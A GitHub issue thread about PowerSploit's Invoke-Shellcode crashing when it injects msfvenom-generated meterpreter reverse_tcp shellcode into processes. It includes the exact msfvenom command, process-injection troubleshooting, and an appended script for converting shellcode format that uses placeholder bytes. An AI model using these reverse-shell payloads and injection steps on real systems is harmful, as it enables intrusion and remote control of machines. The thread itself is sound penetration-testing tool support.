PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework

Invoke-Shellcode working with updated msf? #39

Closed ChrisTruncer closed 10 years ago

ChrisTruncer commented 10 years ago

Hey there,

First off, big fan of a lot of your scripts on here. Really useful stuff. Myself and two other guys work on Veil, and we ran into an issue with powershell injection, and I think it may apply here too. I could be doing it wrong, but figured I'd at least ask and see your thoughts.

It looks like a recent update to MSF may have caused some problems with injecting shellcode via powershell, either into itself, or another process. We tested powershell injection with an old version of MSF, and it worked, and then testing with the latest version, it crashes for us. We originally thought that it may be a problem on our end, so to test that, I grabbed your Invoke-Shellcode script, formatted the msf shellcode properly for your script, and then tried injecting the shellcode into powershell, and then also into a notepad process I had running, using Invoke-Shellcode. Both attempts resulted in a crash of the process.

So, long story short, I COULD be doing it wrong, but never seemed to have an issue before when using Invoke-Shellcode, but it seems to crash now. I was curious if you were also able to re-create the crash. If you need more info from me, let me know in here, but I didn't do anything special besides giving it -Shellcode and then the shellcode (formatted as per your example in the script).

obscuresec commented 10 years ago

Chris,

Do you mind checking the architecture of the shellcode and the architecture of the process you are injecting into? Also, what is the OS so I can try and recreate the problem.

Do you know more about the update that they made?

Chris C.

On Thu, Mar 6, 2014 at 2:48 PM, ChrisTruncer notifications@github.com wrote:


ChrisTruncer commented 10 years ago

I don't know about the update, I'm trying to look back and see what it is. It's odd, all other formats of injection that we play around with work fine, it seems only isolated to powershell.

I just used Invoke-Shellcode on an x86 Filezilla process, generated x86 windows/meterpreter/reverse_tcp shellcode with msfvenom. I loaded up Invoke-Shellcode on Win 8.1 (which is x64), and told it to inject into the filezilla process. That caused a crash of it.

If there is a different OS, or something else I can help create an environment that's easy for you to test on, then let me know. Will (harmj0y) and I have been trying to look at this and figure out what it could be for a little bit now.

ChrisTruncer commented 10 years ago

Also, Will has been testing on a Win 7 VM (x64) and had the same issue. Again, it only happens when he updated MSF. When he uses MSF version 4.8.2 it works, but when updating to the latest, it crashes.

mattifestation commented 10 years ago

Hey Chris. Thanks for the kind words. :)

Could you provide the exact command you used to generate the offending payload? Honestly, I haven't used msf in years so I'm certainly not abreast to any recent changes. If I can replicate the crash though, I should be able to figure out the issue in no time. Can you also answer the following questions for me?

  1. Was your exit method "thread"? What I'm mainly curious about is whether or not the last instruction executed in the payload is a RET. This is important because the shellcode stub in Invoke-Shellcode transfers control to the primary shellcode payload via a CALL.
  2. Does the payload crash immediately upon execution or upon completion of the payload? I suspect the crash will occur after execution of the payload.
  3. Were you injecting into another process with Invoke-Shellcode or did you only provide the -Shellcode switch?
  4. What was the architecture of your shellcode and the PowerShell process you ran Invoke-Shellcode in?

Thanks! If it's easier for you, you can just send me the shellcode byte array that was causing the crash and I can give you a quick answer as to what the issue might be.

Cheers, Matt

ChrisTruncer commented 10 years ago

Hey Matt,

I absolutely couldn't say enough good stuff about Powersploit. It's really advanced and I think it's great work.

For the shellcode generation, I/we are invoking msfvenom. We're running basically the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f c | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-

To get it into the format you guys use, you can add on the piping I added above. Honestly, I haven't tested custom generated shellcode. For a lot of the stuff we do, we can use MSF, so we just use their shellcode generation capabilities. It'll show a couple of messages at the top when using that command, but it'll default to x86 arch for a windows platform. To test, I've started an x86 process on both win 7 and win 8.1. When injecting into the process on both platforms, it crashes the process on the latest version of MSF, but as of a previous version (metasploit v4.8.2-2014021201 [core:4.8 api:1.0]), it worked for Will (harmj0y). As of metasploit v4.8.2-2014021901 [core:4.8 api:1.0] (which is what I have installed), the crashes happen. So we've essentially isolated it from that update to be working, to current version, crashes are happening.

As for your questions:

  1. We've been using the exitfunc == process. We can try testing thread, no problem, but I can also state that process did used to work.
  2. The crash looks to be immediately upon execution of the shellcode. No callback is ever received.
  3. I tried both injecting into powershell (but that was an x64 process having x86 shellcode injected into it), and also loaded up a couple of x86 processes (filezilla, and something else), tried injecting into those as well, and it crashed.
  4. Both my win 7 and win 8.1 are x64. Same with Will's machines. The odd thing about this is that this setup used to work.

Anyways, not trying to cause a ton of work or man hours. If it's a ton of work, I don't want to bother you all about it. I was just curious that it was impacting us, and that it seemed to also impact the Invoke-Shellcode script, and figured I'd let you know (and would love to know if I'm messing it up somehow).

Anyways, thanks, and I'm interested if you guys see the same issues.

mattifestation commented 10 years ago

Hey Chris,

I generated a bunch of payloads and couldn't replicate the issue you were running into until I started playing around with your sed command. The '1,6d' portion of the sed command was truncating a portion of the shellcode. Instead of messing with sed, try '-f powershell' with msfvenom.

ChrisTruncer commented 10 years ago

Hey Matt,

You're absolutely right. Once I just used -f powershell that fixed it. Also, that led me to look into msfvenom specifically, and I figured out the issue. The new MSF update changed some of the output of msfvenom, only slightly, but enough to cause stuff to crash for us, as we were including messages, along with the shellcode, and that obviously caused powershell to crash. And my sed fail, ha, caused this to crash.

So I can confirm there isn't an issue at all, it was all a good old layer 8 error. Sorry for having you guys look into something where there wasn't an issue, and really appreciate you all taking the time to do so.

Thanks a lot, I'm closing the issue out.
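The root cause above is a parsing assumption: `sed '1,6d'` deletes a fixed number of lines, so whenever msfvenom prints a different number of informational lines before the C array, the first lines of shellcode are discarded (or stray text is kept) and the injected bytes no longer match the payload. The following is an added example, not code from this thread, from PowerSploit or from Veil: it converts `-f c` output by keeping only the quoted string lines rather than a fixed line count, and adds a byte-count check that compares the `\x` escapes in the raw output with the `0x` bytes that survived conversion, which is exactly the check that would have caught the truncation. The sample input is constructed: the two informational lines stand in for the messages the thread says msfvenom printed at the top, the byte values are NOP/INT3 placeholders rather than any payload, and all function names are mine.

```shell
#!/bin/sh
# Convert msfvenom `-f c` output into the comma-separated 0x.. list that
# Invoke-Shellcode's -Shellcode parameter expects, and verify nothing was lost.

# Constructed stand-in for `msfvenom ... -f c` output (not real msfvenom output):
# informational lines on stdout, then the C array. Bytes are placeholders.
SAMPLE_C_OUTPUT='No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
unsigned char buf[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xcc";'

sample_input() {
    printf '%s\n' "$SAMPLE_C_OUTPUT"
}

# The fragile conversion from the thread: deletes lines 1-6 unconditionally,
# so it silently drops shellcode when the header is shorter than five lines.
naive_c_to_hexlist() {
    sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
}

# Robust conversion: select only the quoted string lines of the C array,
# drop quotes and semicolons, turn each \x escape into ,0x and join them.
c_to_hexlist() {
    grep '^"' | sed 's/[";]//g; s/\\x/,0x/g' | tr -d '\n' | cut -c2-
}

# Number of \x escape sequences in the raw C-format text on stdin.
escapes_in_c() {
    grep -o '\\x' | wc -l | tr -d ' '
}

# Number of 0x tokens in a comma-separated byte list on stdin.
count_bytes() {
    tr ',' '\n' | grep -c '^0x' || true
}

# verify_conversion CONVERTER RAW_TEXT
# Succeeds only when every \x escape in the input survived as a 0x byte.
verify_conversion() {
    local expected got
    expected=$(printf '%s\n' "$2" | escapes_in_c)
    got=$(printf '%s\n' "$2" | "$1" | count_bytes)
    [ "$expected" -eq "$got" ]
}

# Demo: run both converters over the sample and report whether every byte survived.
for conv in naive_c_to_hexlist c_to_hexlist; do
    if verify_conversion "$conv" "$SAMPLE_C_OUTPUT"; then
        echo "$conv: ok ($(sample_input | "$conv" | count_bytes) bytes)"
    else
        echo "$conv: MISMATCH, $(sample_input | "$conv" | count_bytes) bytes kept of $(sample_input | escapes_in_c) in input"
    fi
done
```

Running the script shows the naive converter keeping only the last three placeholder bytes of the constructed sample while the line-selecting converter keeps all 27, and `verify_conversion` fails for the former. In practice the simplest fix is the one Matt gave, `msfvenom -f powershell`, which emits a PowerShell byte array directly and removes the parsing step; the count check is still worth running on any hand-converted shellcode before injecting it, since a truncated payload crashes the target process rather than producing an obvious error.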